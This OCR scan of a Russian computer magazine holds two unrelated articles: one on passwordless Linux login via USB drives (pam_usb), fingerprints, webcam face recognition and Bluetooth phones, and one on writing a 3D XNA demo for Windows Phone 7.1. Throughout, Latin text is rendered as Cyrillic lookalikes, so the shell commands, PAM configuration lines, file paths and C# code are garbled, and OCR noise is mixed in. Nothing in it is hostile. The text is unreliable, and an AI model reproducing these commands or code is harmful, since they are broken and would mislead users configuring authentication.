зован Ц915К$ (аргумент«имя» здесь используется, чтобы 
дать флешке произвольное название, а не дляуказания ее 
файла-устройства), так что важно, чтобы другие внешние 
накопители на время работы этой команды были отключены. 
3. Теперь даем рат_чи$Ь понять, чтобы эта флешка была 
ассоциирована с нужной нам учетной записью [путь это 
будетуасуа): 


$ зидо рати$6-соп+ --а4а-изег уазуа 


4. Запускаем проверку правильности собранных данных 
на случай, если флешка не была корректно идентифи- 
цирована. Или мы забыли отсоединить какой-то другой 
накопитель, ион был использован вместо нужного нам: 


$ зидо рати$зЬ-сНеск уазуа 


5. Добавляем рат_и$6 в список модулей, необходимых 
для проведения успешной аутентификации пользова- 
теля. В Урип\и и других дистрибутивах, основанных на 
Оефап, это делается с помощью модификации файла/ 
ес/рат.9/согпгтпоп-ац{В. В нем необходимо найти строку 
примерно следующего вида [она может отличаться}: 


\ачЕВ геди1геЯ рат_ип1х. $0 


И прямо перед ней добавить следующую строку: 


ацЕН зи РАс1еп{ рат_и$Ь. 50 


Такмы сообщим РАМ, что перед логином любого пользова- 
теля нужно отдавать управление модулю рат_и$6, который 
проверитналичие нужной флешки, и лишь в случае неуда- 
чи этой операции запрашивать пароль. Поэтому, если ты 
хочешь впускать пользователя только по флешке, полно- 
стью блокируя аккаунт в случае неудачи, слово «зиИаег» 
следует заменить словом «гедшигед». В принципе, всего 
этого должно быть достаточно для того, чтобы система про- 
сто работала [попытайся выйти и войти, чтобы это прове- 
рить}, однако функциональность рат _из6 можно несколько 
расширить, если использовать демон рати$6Б-адеп\. 
Задача рапти$6-адеп{ — автоматизировать работу по 
блокированию и разблокированию учетной записи поль- 
зователя при извлечении и втыкании флешки в комп. 
Чтобы агент заработал, необходимо добавить в конфигу- 
рационный файл /е{с/ратизЬ.соп следующие строки: 


[ео 


р› шЮ 


® Аналог файла /е{с/ 
рат.9/согпитоп-ац(Н 
в бет{оо и Мапагма 
носит имя /е{с/ 
рат.9/зу${ет-ац В, 
во ГгееВЪО вместо 
него используется / 
ес/рат.9/зучет. В 
АгсйИпих придется 
править РАМ-конфиги 
отдельно для каждого 
приложения. 


® Еще один способ 
обезопасить машину 
от вторжения — уда- 
ленно создать файл / 
ес/поюдт с помо- 
щью любого мобиль- 
ного 55Н-клиента. 
Для разблокировки 
придется войти как 
гоо{т и удалить этот 
файл. 
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Ра г роет . СИТИ 
Настраиваем аутентификацию 
с помощью 15В-Назй 


<и5ег 14="имя_юзера"> 
<де\у1се>имя_устройства< /ае\м1се> 


‹авепе еуеп*="1оск"> 

поте - зсгееп5ауег-соттапа --1осК</авеп*> 
‹авепе еуеп*="ип1осК" > 

поте -зсгеепзауег-соттап@ --аеас{1\уа{е< /авеп*> 


</ичзег» 


Это рецепт для бпоте. Чтобы использовать ратиз6-адеп{ с другими 
средами, команды «дпоте-зсгеепзауег-согптапа --[0сК» и «дпоте- 
с<сгеепзауег-согптапа --Чеасйуае» необходимо изменить. 

Теперь можно запустить ратиз6-адеп{ и проверить его работоспо- 
собность: 


$ рати6-авепЕ 


Если все работает нормально, можно добавить его в автозапуск: 


$ са -/ .сопЯё/ацо$ЖагЕ 
$ Лт -5$ /чзг/61п/рати$Ь -авепЕ рати$Ь-авепЕ 


Обкатаем пальчики? 


Модуль рат_ч$6 удобно использовать в качестве метода защиты 
ноутбуков, оснащенных кард-ридером. Можно носить небольшую 
5О-карту в кошельке или внутреннем кармане и втыкать ее в ноутбук, не 
беспокоясь отом, что она будет мешать (как это происходитв случае с 
Ц5В-флешкой]. Однако этот подход будет выглядеть несколько архаич- 
но, если ноутбук уже оснащен сканером для снятия отпечатков пальцев. 
Ноутбуки со сканером отпечатков пальцев выпускают многие про- 
изводители. Как правило, они не намного дороже других сходных по 
характеристикам моделей, однако их сенсор отпечатков работает 
только в \\п4о\м$. Для устранения этого недостатка геедезК{ор.ога 
запустил проект реп (млм. геедезКор.ога/микИбоН\маге/ реп в 
рамках которого разработана открытая реализация библиотеки для 
распознавания отпечатков и соответствующий РАМ-модуль, по- 
зволяющий задействовать возможности библиотеки во время логина 
пользователя и других манипуляций над аккаунтом. 

Сегодня ИБрип( есть в любом дистрибутиве, поэтому установить его 
можно с помощью любого пакетного менеджера: 


$ эи4о ар*-ве{ 1п$%а11 116рг1п*0 \ 
116рат-Ерг1п{ Ерг1п*-дето 


Далее сканер можно проверить с помощью специальной демонстра- 
ционной программы с графическим интерфейсом: 
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гураци 
сразу после добавления Ш5В-флешки 
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онный файл /ес/рагтиз$Ь.сой? 


$ Ерг1пЕ_аето 


Если все работает корректно и без сбоев, можно начать на- 
стройку аутентификации. Для этого следует запустить программу 
рат_Тргп_епгоЦ, которая позволит сделать эталонный слепок 
отпечатка пальца, который затем будет использован для иденти- 
фикации его владельца: 


# рат_Ерг1п*_епго11 -епго11-Япдег 7 


Цифра 7 здесь означаетуказательный палец правой руки. Система 
Гргип{ нумерует пальцы слева направо, так что цифрой 1 будет обо- 
значен мизинец левой руки, а 10 — мизинец правой. 

Когда слепок будет готов, добавим модуль рат_1ргг( в стек РАМ- 
модулей всех приложений, для этого открываем файл /е{с/рат.а/ 
согптоп-ащй, находим всету же строку «ащ{ гедигед рап_ипих.50» и 
добавляем прямо перед ней строку, отвечающую за загрузку рат_Ёриг(: 


ацЕИ зи Яс1епе рат_4+рг1п*. $0 


При следующем логине все должно за работать. 


Память налица 


Пальцы — не единственное, что отличает людей друг от друга. У всех 
нас разные лица, поэтому для идентификации пользователя система 
может использовать снимок лица, сделанный веб-камерой. Это не 
особо секьюрно, так как атакующий может показать камере обычную 
фотографию, отпечатанную на бумаге, но произведет очень сильное 
впечатление на друзей и знакомых. 

В Ипих-дистрибутивах нет встроенных средств распознавания лиц, 
однако их можно добавить с помощью установки комплекта ПО под 
названием рат-{асе-ац{НепИсаНоп (мллл/. рат-‘асе-аВепИсайоп. 
ога), который включает в себя библиотеку, реализующую алгоритм 
распознавания лиц, РАМ-модуль для осуществления аутентифика- 
ции и приложение для генерирования эталонного снимка. 

Все это можно собрать из исходников или же установить из сторонних 
репозиториев в УБип\{и. Так как проектеще сырой, и пакеты под- 
готовлены не для всех дистрибутивов, мы рассмотрим оба варианта 
установки. Итак, для установки из исходников нам понадобятся 
пакеты с компилятором, линковщиком и заголовочными файлами 
для всех зависимостей. В УБип\ [да и в других дистрибах] их можно 
установить, выполнив одну команду: 


$ эи4о ар*-ве{ 1п5%а11 Би11а-ез5епЕ1а1 стаКе \ 
9*4-дтаке 116х11-ае\у 116су-деу 116суаих-аеу \ 
11601205414 11601518и1-де\у 116а944-аеу \ 
116рат@5-ае\у 
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Далее скачиваем исходники со страницы проекта и распаковываем: 


$ са 
$ иреЕ НЕЁр: //=00.51/4р01$ 
$ Еаг -хи{ рат-Фасе-ацНеп*1са*1оп-@0.3.+аг.57 


Для сборки используется сгаке, поэтому здесь все просто: 


$ са рат-Фасе-аиЕпепЕ1са*1оп-0.3 
$ стаКе && таке 
$ сидо таКе 1п${а11 


Для установки уже прекомпилированного пакета в УБиг(и можно ис- 
пользовать репозиторий а {оп!о.сВ!ига771: 


$ эи4о а9а-ар*-геро$1Фогу рра:ап%оп1о.сН1ига2271/рра 
$ зи4о ар*-вее ирда*е 
$ зи4о ар*-ве{ 1п$5$%а11 рат-ФРасе-аиЕПеп1са1оп 


После окончания установки запускаем обучающую программу: 


$ 9Е-Расефга1птег 


Вертим лицом перед камерой, постоянно нажимая кнопку «Сар*иге». 
Важно сделать хотя бы десяток фотографий, чтобы система научи- 
лась распознавать твое лицо под любым углом. Также будет неплохо 
сделать фотографии при разной освещенности. Не забываем про- 
тестировать работу системы. 

Теперь добавим модуль рат_Тасе_аи\ВеписаНоп.$0 в стек загружае- 
мых РАМ-модулей. Для этого открываем файл /е{с/рап.4/дгт или / 
е{с/рапл.9/Кагл [если ты пользуешься КОЕ} и добавляем в его начало 


следующую строку: 
ацЕП зийс1еп рат_Фасе_ач{ПепЕ1са1оп. зо епаб1ех 


Файл /е{с/рат.4/согпгпоп-ац{} изменять не надо, так как он исполь- 
зуется не только графическими менеджерами входа в систему, но и 
стандартными консольными /бт/юдт и /Бп/вч, а рапт_Ёасе требует 
доступа к иксам. 

Также необходимо создать профиль для нового РАМ-модуля. От- 
крываем (создаем) файл /изг/зВаге/рап-соп#На$/асе_ац\ПеписаНоп 
следующего содержания: 


Мате: Мапиа11у 1п5Фа11е4 Гасе_аи{Пеп1са1оп ргой1е 
Ое+аи1*: уе5 

Рг1ог1фу: 900 

АчЕВ-Туре: Рг1магу 

АитИ: 

[зиссе$5=епа дефаи1*=1впоге] 
рат_+асе_ацч{Пеп{1са{1оп.5о епаб1ех 


И активируем его: 


$ эи4о рат-аиЕН-ирда{е --расКаёе Фасе_аи{Пеп1са1оп 


Ключ изтелефона 


Сотовый телефон — символ 21-го века. Мы давно привыкли ктому, 
что его можно использовать не только для звонков, нои для выхода 

в интернет, игр, прослушивания музыки, просмотра видео и даже 
оплаты счетов. Но можно ли использовать его как ключ для входа в 
компьютерную систему? 

Конечно, да. Каки Ч5В-флешка, телефон имеет множество при- 
знаков, которые делают его уникальным. Это все те же идентифи- 
каторы производителя и модели, серийный номер, МАС-адреса, 

| МЕТ, в конце концов. Любой из них можно использовать для 
однозначной идентификации устройства и его владельца, но мы 
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остановимся только на одном изних — МАС-адресе Вшаюо- 
интерфейса. 

Любой, даже очень древний и простой телефон имеет поддерж- 
ку протокола Вше{оо{1 и, как следствие, уникальный МАС- 
адрес, который передает в сеть в ответ на любой запрос поиска 
устройств другим В[иефоо{П-адаптером. Многие современные 
ноутбуки имеют на борту такой адаптер, а его внешний У$В'шный 
вариант стоит копейки, так что для нас синий зуб будет идеаль- 
ным вариантом для настройки беспарольной и беспроводной 
аутентификации. Зашел в комнату — доступ открыт, вышел — 
система заблокирована. 

Берем телефон, включаем Вшеоотй, делаем так, чтобы он был 
«видим» другим устройствам. Садимся за комп и запускаем утилиту 
ЮсКоо( (входит в пакет Бше7-и{ $] в режиме поиска устройств: 


$ Ис1001 зсап 


Получаем имя своего устройства и его МАС-адрес, копируем по- 
следний в буфер обмена. Устанавливаем пакет ИБрапт_Б {ие (или 
рага_Б ше, где как}: 


$ зид0 ар*-веф 1п$$а11 116рат_Ь1ие 


Создаем файл конфигурации /е{с/зесигНу/Б ше$$сап.сопЁи пишем в 
него следующее: 


# Общие настройки 

сепега1 { 
# Продолжительность сканирования в секундах (от 3 до 15) 
{1теои* = 15; 


# Настройки пользователей и их устройств 
ту1о81т = { 

пате = Имя устройства; 

Ь1иетас = МАС-адрес устройства; 


Сохраняем файл, открываем уже знакомый нам конфиг/Е{с/рат.а/ 
соттоп-ащВ и добавляем строку: 


ацЕИ зиНс1епе рат_ЬБ1ие. 50 


перед строкой, содержащей «рап_игих.$0». 

Теперь для входа в систему будет достаточно положить телефон ря- 
дом с ноутом и ввести имя. Далее управление будет передано модулю 
раг"_Б ше, который просканирует сеть, найдет МАС-адрестелефона и 
впустит пользователя. В противном случае придется ввести пароль. 


Выводы 


Настроить беспарольную аутентификацию с помощью альтерна- 
тивных методов в !пих довольно просто. Для этого не нужно быть 
матерым гиком, уметь писать код или иметь глубокие познания в 
области безопасности, все делается за несколько минут и работает 
поразительно эффективно. Ты можешь сказать, что большинство 
из этих методов потенциально небезопасны и легко обходятся, но 
перед тем как это сделать, задумайся о том, насколько безопасны 
обычные пароли. 

Безопасность машины, к которой могут получить доступ сторонние 
люди — чистой воды миф. Обойти стандартную защиту паролем про- 
ще простого. Есть огромное количество способов сделать это, и все 
они известны даже детям. Пароль — это лишь небольшой указатель- 
ный знак, несущий информацию о том, что у компа есть владелец, и 
он не хочет видеть непрошенных гостей. Применив методы, опи- 
санные в статье, мы не сделаем систему более уязвимой, но сможем 
сделать свою жизнь прощеи удобнее. = 
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+ 
ПОКОРЯЕМ 
УЛМОСУ 


РНОМЕ 7.1 
ы 


Начинаем кодить Иры Под новую ось, 
конкуренты не дремлют! 


©В июле вышла обновленная операционная система от МисгозоН 
для смартфонов — \\Мпдом$ Рпопе 7.1 под кодовым именем Маподо. 
Этот апдейт (помимо исправления традиционных майкрософтовских 
багов) открыл перед отечественными разработчиками широкие 
возможности, которыми западные девелоперы пользовались с 
релиза первой версии системы. 


ОчЧосок 


не могли напрямую получать деньги за продаваемые в магазине 
МЛпаом/5 РВопе Магке{р[асе-приложения. Все это обещали испра- 
вить в следующем апдейте. 

На проходившей в конце мая в Москве конференции Ое\уСоп`11 
Мтсгозо В объявила, что апдейт М/Мп4о\м/ РВопе 7.1 (Мапдо] выйдетв 
июле и будет содержать все обещанное ранее. Заглядывая в будущее 
[а ведьты читаешь этот номер уже в будущем :], можно сделать вывод, 
что сейчас — самое время начать разрабатывать приложения для 
этой платформы. Поскольку \М/Р — молодая система (ей нетещеи 
года), то и прикладные программы для нее нужны разного характера. 
Тем не менее, обращая твое внимание на первый абзац, добав- 

лю неоспоримый факт: приложения, пользующиеся наибольшим 
спросом на мобильных устройствах — это игры. Их разработкой я и 


Развлекаться с помощью смартфона можно по-разному: посмо- 
треть свежий блокбастер, послушать музыку или же поиграть. 
Раньше автор пренебрегал возможностью поиграть на мобиль- 
ном устройстве, считая, что на нем нельзя получить фан отигры. 
Однако прошло время, и стали появляться миниатюрные девай- 
сы с достаточной для многих игр конфигурацией. Тем не менее, 
эти устройства оставляли меня равнодушным. После выхода в 
конце прошлого года операционной системы \Ипаом/з РПопе 7.0 
ситуация изменилась. Теперь стало возможным программировать 
мобильные игры, используя «родной» инструментарий и нако- 
пленный за время программирования под винду опыт. Однако, 
в прошлой версии ОС не было поддержки великого и могучего, 
и телефоны с ней не были предназначены для продажиу насв 


стране. Было грустноеще и потому, что российские разработчики 
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предлагаю заняться. 
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Рис. 1. Новые шаблоны проектов 


\МЛпао\/$ Рпопе /.1] Мапдо 


Как уже было сказано ранее, чтобы разрабатывать 
приложения для \\/Р, надо использоватьте жетулзы, 
что и в процессе разработки десктопных \\Лпао\м/<- 
программ. Можно посчитать это за счастье, так как для 
разработки приложений под предыдущую мобильную 
ОС от Мисго$оН — \\пдом/$ МоБце 6.5, необходимо было 
использовать еМбедаеч \15ца({00[$, который предлагал 
два генномодифицированных языка — еМБеаадеч \Мзиа( 
Ваз!с и еМБедаеа \Мзиа( С++. 

Таким образом, тебе понадобятся Мзца( 5{иаю 2010, 
‚МЕТ Егагпемогк 4.0 (именно эти версии, или новее, если 
хочешь программировать для \!/Р 7.1} и, собственно, 
комплект разработчика \\Лп4о\/5 РПопе Оеуворег Тоо[5 
— имеется бета для ОС \\Р 7.1, которую свободно можно 
скачать с сайта М!сгозо в). Впрочем, пакет самодостато- 
чен, он включает: бесплатную \15ца[ З{и4о 2010 Ехргез, 
возможностей которой вполне хватит для разработки под 
М/Р,. МЕТЕгатем/огк 4.0, 5ЦмегИа ПЕ 4.0, ХМА 4.0, \\ММп9ом$ 
РБопеЕти[а{ог. Еще на машине, которую будешь исполь- 
зовать для разработки и отладки (с помощью эмулятора] 
игр для \Р 7.1, должна быть установлена видеокарта с 
поддержкой ОгесХ 10. 

В качестве настольной операционной системы должна 
выступать либо \\паом/5 Ма со вторым сервис-паком, 
либо \\пдом/5 7 — причем За“ег Еа оп не поддержи- 
вается [только не подумай, что я вообще предположило 
возможности ее использования :]]. 

Новая версия пакета разработчика, совместно с \5 2010, 
кромеязыка С# включает поддержку \/15ца[ Ваз!с — те- 
перьего можно использовать для написания мобильных 
программ. После установки \Р-тулз, запусти \$ 2010 и 
просмотри шаблоны для создания аппликаций (рис. 1). 


ХМА у$. Меню] 


Для создания приложений под \\Лпдом/$ РВопе исполь- 
зуются две подсистемы: 5Цуегиа (и ХМА. Обе эти под- 
системы работают под .МЕТ. Следовательно, в МИпдо\м/$ 
РВопе исполняется только безопасный код. В первую 
очередь, 5ЦуегИай{ используется для построения 
пользовательского интерфейса (в том приближении, о 
котором мы привыкли говорить, при разработке оконно- 
го интерфейса в \\Ип9о\/<]. Таким образом, посредством 
языка разметки ХАМ( осуществляется построение 
пользовательского интерфейса для смартфона, в У5 
можно использовать визуальные средства. В контексте 
нашего рассмотрения этой платформы (для разработки 
приложений с динамической графикой], эта функцио- 
нальность нас не вполне устраивает. С другой стороны, 
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т В те би Би: БЕ И Е МБ ЕВЕ "ЗБ "ВЕБ БЕНИН 
58 ий = и = т] 
и Ги гм вт и нее Им — -- лье. 


ХМА специально предназначена для разработки игр. 

К тому же в одном приложении можно комбинировать 
обе подсистемы (обрати внимание на шаблон \//п4о\м/з 
РВопе К!сН бгар!с$ АррИсаНоп (4.0)]]. 

Следуя нашей главной цели, подробнее рассмотрим 
фреймворкХМА. В настоящее время существует уже чет- 
вертая его версия. ХМА — прямой потомок Оигес(Х. На сча- 
стье автора, он был свидетелем всего пути развития этой 
технологии, начиная стого момента, когда она находилась 
в состоянии зародыша и до настоящего момента, когда 
она превратилась в межплатформенный инструмент для 
создания игр. Так, сейчасу Мсго$ой естьтри платформы, 
которые ее поддерживают: десктопная \\Ип9о\ми$, консоль 
ХБох 360 итеперь — смартфоновская ОС \МЛпаом/з РВопе 7.х. 
То есть, игра, написанная для \\Ипдо\/з, при соблюдении 
определенных условий будет работать на двух других плат- 
формах. Чуть позже мы рассмотрим эти условия, асейчася 
скажу пару слов о «зародышевым состоянии» ХМА. 

После выхода программной платформы .МЕТ Егате\могк 
(2002 год) создание игр, выполняющихся под нейи 
использующих ее возможности (в первую очередь, 
сборщика мусора}, было вопросом времени, потому что 
почти одновременно последовал выход Мападед ПОтесх 
— управляемый ОгесХ, выполняющийся в среде .МЕТ. 
Атот ОтесХ, который использовался в нативных С++- 
приложениях, соответственно, стал неуправляемым. За- 
тем вышел МОХ 2.0. Однако он не пользовался популярно- 
стью: среди игроделов ходило мнение, что выполняемый 
под виртуальной машиной [чем, по сути, является .МЕТ) 
код работает медленнее нативного, что для игр очень 
критично. Впрочем, это вполне оправданное утвержде- 
ние. Тогда М!сго5оЙ решила сделать изуправляемого 
Огес(Х нечто большее, чем просто $ОК для управляемых 
языков. В 2006 году вышла первая версия ХМА, которая 
представляла собой не просто улучшенный $ОК, а новый 
инструмент, используя который, разрабатывать игры ста- 
ло проще, чем с помощью неуправляемого ОгесХ. Потому 
что кроме обновленного АР!, в котором скрыты многие 
низкоуровневые технические детали, необходимые для 
разработки игр (инициализация устройств и др.], ХМА 
предлагала дополнительные тулзы в помощь игроделам. 
А поскольку игры теперь смогли выполняться под общей 
программной платформой .МЕТ ЕгагтемогК, то и запу- 
скаться они могут на разных аппаратных платформах (вто 
время — РС [десктопная \/Мп4о\/з] и ХБох 360). 


3З0О-эксперимент 


Теперь настало время заняться кодингом и написать 
графическое приложение для \\п9о\м/5 РВопе 7.1. Что 


| 0У0 


› ЧУЧ 

® На диске тебя 
ждет дополненный с 
учетом современных 
реалий видеоурок по 
теме. Не пропусти! 


® На диске лежит 
весь исходный код 
разработанного в те- 
чение статьи проекта. 
Также там находится 
весь сопутствующий 
контент. 


[НТТР-//ММ/УГ 


р ЦпК$ 
сгеа{е.тзЧдп.согп — 


стартовая точка для 
\\Р разработчика. 


ЕО 


р шо 

В «Гемном искусстве 
игродела» я не на- 
писал о тулзе, которую 
юзал для создания 
З0-объектов. Тогда 
она была платная. 
Сейчас {гиеЗрасе 
распространяется 
бесплатно. Вот ссыл- 


ка: мллми.саЦдаг!.согп. 
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Рис. 3. В процессе работы нашей демонстрации ЗО 


же нам написать? Наше первое приложение будет демонстраци- 
ей возможностей 3З0-визуализации смартфона на базе \\Р 7.1. 
Запусти \$ 2010 и в качестве шаблона создаваемого приложения 
выбери «\15ца[ СЯ -» ХМА бате 5шаго 4.0 > \ММпдом/5 РВопе бате 
(4.0]». В результате будет сгенерирована заготовка для разработки 
игры. Обратим внимание на некоторые технические детали. Так как 
для \/Р установлено стандартное разрешение экрана (480х800), 
значит, наша графика будет выглядеть одинаково на разных 
девайсах. К тому же \/Р поддерживает приемлемую для игр частоту 
кадров — 30 {$ [можно поменять, изменив значение переменной 
Тагде{Е(арзеЧТите). Хотя на десктопе, на котором ведется разра- 
ботка графического приложения для \/Р, должен быть видеоадап- 
тер с поддержкой ПОигес(Х 10, на смартфоне \Р используется ОХ 9. 
Один из нюансов разработки, переносимых между тремя платфор- 
мами игр, состоит в использовании ОХ 9. В ХМА явно не указы- 
вается, какая версия ОХ используется, зато можно определить 
профиль устройства в свойствах проекта. Для РС и ХБох 360 можно 
использовать профиль НШер, который соответствует высочайшему 
качеству графики, и соответствует десятой версии ОХ. С другой 
стороны, наша целевая платформа \Р не поддерживает этот про- 
филь, поэтому нам придется использовать профиль Кеасй, который 
соответствует 0Х 9 со всеми вытекающими отсюда последствиями. 
Другие нюансы связаны с реализацией контрола, который сильно 
отличается у разных платформ из-за различных устройств ввода. 
Правда, ХМА 4.0 поддерживает все их виды. 

Прямо сейчас скомпилируй и запусти приложение. Если все установ- 
лено правильно, то в запустившемся эмуляторе телефона ты увидишь 
закрашенный монотонным цветом дисплей (рис. 2}. 

Закрой эмулятор и подготовь контент для своего приложения 
[можешь взять с нашего диска]. По замыслу в качестве фона будет 
выступать текстура. С помощью контент пайплайн загрузи файл 
баскагоипа.|рд. Да, если не в курсе, контент пайплайн — это меха- 
низм, интегрируемый в студию после установки ХМА. Основное его 
предназначение — это осуществление прямого доступа к ресурсам 
— контенту игры. То есть, загрузив в него, например, текстуру, можно 
напрямую обращаться к ней, не обращая внимания на реальное ее 
расположение. Дополнительно при его использовании определен- 
ный ресурс будет загружен в память только единожды, и не получится 
ситуации, когда один и тот же объект будет загружен повторно. 

После загрузки текстуры попробуй вывести ее на экран эмулятора 
смартфона, для этого потребуется написать всего несколько строчек 
кода. Во-первых, открой в студии файл батеТ.с$, и в конструкторе 
класса бате1 задай параметры экрана: 


{01$ .вгарИ1с$ .РгефеггедВаскВи+РегНе1ей* = 480; 
{01$ .вгарИ1с$ .РгефеггейдВаскКВи{Регит ати = 869; 
{01$ .вгарИ1с$. Т5Ри1 15 сгееп = гие; 


Таким образом, мы устанавливаем альбомный режим экрана. За- 
тем в функции [оа9Соп{еп{{ после создания объекта зргцеВа{(сН 
добавь следующую строчку кода: Басквгоипа = Соп%еп+. 
Гоа4<Тех%иге20> ( "Техфиге$/БасКвгоипа");. С ее помощью происхо- 
дитзагрузка текстуры в память. Пролистай листингвниз до функции 
Огам/, после комментария ТОГО добавьтакиетри строчки: 


› 108 


5рг1еВаесН .Веё1п(); 

5рг1еВатсН .Огам(БаскКёгоипа, пем Весфапё1е 
(9, 6, 8060, 480), Со1ог.ип1е); 

5рг1{еВаесН.Епа(); 


Для прорисовки текстуры используется ранее созданный объ- 
ектэргКеВа{(сй: первый метод — Вед данного объекта начинает 
группу операций рисования (в нашем случае только одну}, используя 
одинаковые настройки, они задаются в параметрах метода. В нашем 
примереунего нет параметров. Затем метод Огам/ выводит загружен- 
ную ранеетекстуру. В данном примереу него три параметра (какиу 
предыдущего метода, имеются перегруженные варианты): указатель 
на прорисовываемую текстуру, объект — прямоугольник с параме- 
трами для вывода и цвет для придания оттенка (белый — не играет 
значения]. Последний метод сбрасывает на задний буфер (хе-хе, «за- 
дний буфер» — это круто, Бивис — прим. ред.] содержимое объекта 
класса 5рг(еВа{сВ и восстанавливаетего состояние, предшествую- 
щее вызову метода Ведгт. 

Откомпилируй и проверь: весь дисплей должна покрыть указанная 
текстура. Далее добавим трехмерные объекты. ХМА поддержи- 
вает для загрузки два формата: файлы *.хи *.х. ФорматХ ранее 
был стандартным для ПОигесХ, однако, начиная с десятой версии 
библиотеки, этот формат потерял поддержку. К слову, теперьтам 
используется формат *.5ЧКтезйВ, для которого не существует экс- 
портеров. Но М!сгозой не оставила свой новый формат в таком 
плачевном состоянии и выпустила конвертер — утилиту командной 
строки тезйсопуег(, который предназначен для конвертирования 
изХвАктезйВ. Второй формат — *.Бх — очень распространен и 
поддерживается всеми продуктами от Ащодес5кК. По сути, он являет- 
ся форматом для переноса моделей между приложениями. Теперьу 
тебя точно не возникнет проблем с созданием собственных моделей 
для своих игр. С диска можешь взять подготовленную мною модель 
[я взял из {гиебрасе то, что было]. Она находятся в Х-формате. 
Загрузи ее в контент пайплайн, соблюдая структуру каталогов, то 
есть так, чтобы во внешнем каталоге находился х-файл и на этом же 
уровне — одноименная папка стекстурами. Еще одна замечатель- 
ная возможность контент пайплайна — это компиляция контента 

в свой собственный оптимальный для исполнения формат. При 
первой загрузке приложения контент пайплайн просматривает все 
имеющие файлы, и если какой-то объект может быть преобразован, 
он преобразует его. 

Сейчас можно сначала попробовать загрузить и вывести на экран 
модель, ноя предлагаю этого не делать, а сразу разработать класс 
для реализации возможности создания нескольких объектов без 
дублирования кода. Создай новый файл обес{.с$ и напиши в нем 
код одноименного класса, он инкапсулирует функциональность 
создаваемых объектов (для подсказки смотри исходник с диска]. 
Пока ты его пишешь, я коротко расскажу, что здесь происходит. 
Вначале, как всегда, происходит подключение пространств 

имен — обрати внимание, используется пространство ХМА. Затем 
уже в описании класса объявляются и инициализируются пере- 
менные — члены класса. Далее идет конструктор. Безусловно, в 
нашем примере можно было обойтись без него, потому что пере- 
менные уже инициализированы, и с созданием объекта прекрасно 
бы справился конструктор по умолчанию. Однако, посколькуу нас 
два объекта этого класса, то необходимо поместить их в разные 
координаты. Этим и занимается конструктор, получая в качестве 
параметра множитель для смещения. Дальше идет одна из моих 
любимейших конструкций языка С# — свойство. Его устройство 
напоминает мне разработку визуальных компонентов для Ое[рй! :}. 
Метод установки значения данного свойства довольно обширен, 
он производит преобразование переданного угла из градусной 
меры в радианную, используемую в ХМА, а последним шагом соз- 
дает матрицу поворота по оси \ и присваивает ее переменной — 
члену класса. Затем идет метод Огам/ОБ], который прорисовывает 
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модель, хранящуюся в переменной тоде(. В начале этого метода 
путем перемножения матрицы сдвига и матрицы вращения созда- 
ется целевая матрица перемещения объекта. После этого в цикле 
Гогеасй перебираем все меши объекта, чтобы затем во вложенном 
цикле через умножение матрицы текущего меша на полученную 

на предыдущем шаге матрицу получить мировую матрицу. Все эти 
трансформации нужны для корректного отображения объекта в 
пространстве. Объект класса Ваз1сЕКМес{ кроме собственно про- 
странственной матрицы содержит многие другие свойства: тек- 
стурные координаты, альфа-составляющую материала, параметры 
для освещения, видовую матрицу, матрицу проекции и многое 
другое. Вообще, этот объект предоставляет возможности такого 
механизма, который раньше в Отгес{Х назывался фиксированным 
конвейером визуализации. Но, начиная с ОХ 10, его напрочь уда- 
лили, оставив только программируемый конвейер. Для того чтобы 
с его помощью визуализировать хоть что-то, надо писать свои 
шейдеры. Конечно, это позволяет добиться наилучших результа- 
тов, однако иногда вполне подходят стандартные механизмы. В 
ХМА тоже имеется программируемый конвейер, но мы его рассма- 
тривать сегодня не будем. Последняя операция метода Огам/ ОБ] 
[также находящаяся в цикле Югеас|] выводит меш в задний буфер. 
Единственное действие, выполняемое методом Урдае{а{е, — это 
обновление позиции объекта в пространстве путем скалярного 
умножения вектора направления вперед матрицы го{Ма{-объекта 
и переданного в параметре значения. Последний метод класса 
БешрЕНес{$ вызывается лишь единожды — при инициализации. В 
него передаются матрицы проекции и вида, которые впоследствии 
присваиваются эффекту каждого меша модели. Также, для каждо- 
го меша включается стандартное освещение. Результат операции 
присваивается переменной — члену {гапз, которая участвует в 
построении объекта (в процессе метода Огам/ ОБ} [см. выше). 
Прежде чем запускать построение проекта, надо внести изменения 

в класс бате1, который генерируется автоматом и наследуется от 
М!сго5оК.Хпа.Егапем/огк.Сагте, перегружая некоторые его методы. И 
снова исходник с дискатебе в помощь, здесь же кратко расскажу, что 
там кчему. В начале класса Сбате1 объявляем все глобальные пере- 
менные — так, например, объект класса ОБ]ес* — О6]ес* саг1 = пем 
ОБ]ес*(20); передавая смещение параметром, здесь же находятся 
объявления матриц вида и проекции, они будут инициализированы 
позже. Конструктор класса уже рассмотрен. В функции инициализа- 
ции производим матрицы: 


рго]есЕ1опМа*г1х = Ма*г1х. СгеаеРегзрес{1\уе[1е190+\/1ем 
(МаерНе1рег.ТоКа91ап$ (45.04) , азресЕКа{1о,1.0+,100.0+); 

у1емМа*г1х = МаЕг1х.Сгеае!оокКА* (сатегаРо$1*1оп, 
\Месфог3З.2его, Мес®огЗ.Цр); 


Для создания матрицы проекции передаем: поле видимости по 
оси \ в радианах, соотношение сторон экрана (объявлено ра- 

нее), расстояние до ближней и дальней плоскости отсечения. В 
создании видовой матрицы участвуюттакие значения: позиция 
камеры [объявлена ранее — триплет значений, представляющий 
координаты Х,\,7], направление вида камеры и вектор обзо- 

ра вверх, относительно текущему виду. В методе Гоа Соп{(еп\ 
происходит загрузка ресурсов, так модель для объекта наше- 

го класса загружается такой строчкой: саг1.тоде1 = Соп*%еп*. 
[оа4<Моде1 > ( "Моде1$/Но*гоа" ); Сразу после загрузки вызывается 
метод объекта для установки преобразований мешей модели: 

саг1 .5е*ирЕес*$ (рго]ес1опМа{г1х, у1емМафг1х);, для которого 
передаются ранее созданные матрицы. В методе Урда{е, который 
подобно методу Ога\м/ вызывается при перерисовки каждого кадра, 
осуществляется трансформация наших объектов класса ОБ ес. 
Дополнительно в нем вызывается функция Урдаепри\, которая 
детектит нажатие левой клавиши мыши, и в результате увеличи- 
вает скорость вращения и перемещения объектов, инкрементируя 
значения переменных. Последний метод Ога\м/ выводит все на 
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экран. Сначала он очищает — закрашивает задний буфер сплош- 
ным цветом, затем выводиттекстуру и два объекта класса ОБ]ес+. 
Последняя строчка метода Базе .Огам(ватет1те) ; меняет положе- 
ния первичного и заднего буферов. В итоге все, что визуализиро- 
валось там, теперь на нашем экране. 

Сейчас самое время откомпилировать и протестировать проект. В 
том случае, если все сделано правильно, ты увидишьтакую демон- 
страцию ЗВ на дисплее эмулятора (рис. 3]. 


Звуки 

